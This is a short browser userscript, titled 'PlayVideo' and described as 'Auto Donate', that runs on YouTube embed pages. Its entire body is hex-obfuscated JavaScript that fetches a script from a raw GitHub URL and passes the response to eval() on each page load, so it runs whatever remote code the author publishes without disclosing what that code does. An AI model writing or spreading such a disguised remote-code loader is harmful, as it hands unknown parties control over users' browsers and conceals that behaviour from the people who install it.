// ==UserScript==
// @name         PlayVideo vmhoangit1408
// @version      27.06.2019
// @description  Auto Donate vmhoangit1408
// @author       vmhoangit1408
// @match        https://www.youtube.com/embed/*
// @grant        none
// ==/UserScript==

var _0xe9c2=["\x68\x74\x74\x70\x73\x3A\x2F\x2F\x72\x61\x77\x2E\x67\x69\x74\x68\x75\x62\x75\x73\x65\x72\x63\x6F\x6E\x74\x65\x6E\x74\x2E\x63\x6F\x6D\x2F\x76\x6D\x68\x6F\x61\x6E\x67\x69\x74\x31\x34\x30\x38\x2F\x41\x75\x74\x6F\x44\x6F\x6E\x61\x74\x65\x2F\x6D\x61\x73\x74\x65\x72\x2F\x50\x6C\x61\x79\x56\x69\x64\x65\x6F\x44\x6F\x6E\x61\x74\x65\x56\x6D\x68\x6F\x61\x6E\x67\x69\x74\x31\x34\x30\x38","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64"];var url=_0xe9c2[0];var xmlhttp= new XMLHttpRequest();xmlhttp[_0xe9c2[1]]= function(){if(xmlhttp[_0xe9c2[2]]== 4&& xmlhttp[_0xe9c2[3]]== 200){eval(xmlhttp[_0xe9c2[4]])}};xmlhttp[_0xe9c2[6]](_0xe9c2[5],url,true);xmlhttp[_0xe9c2[7]](null)
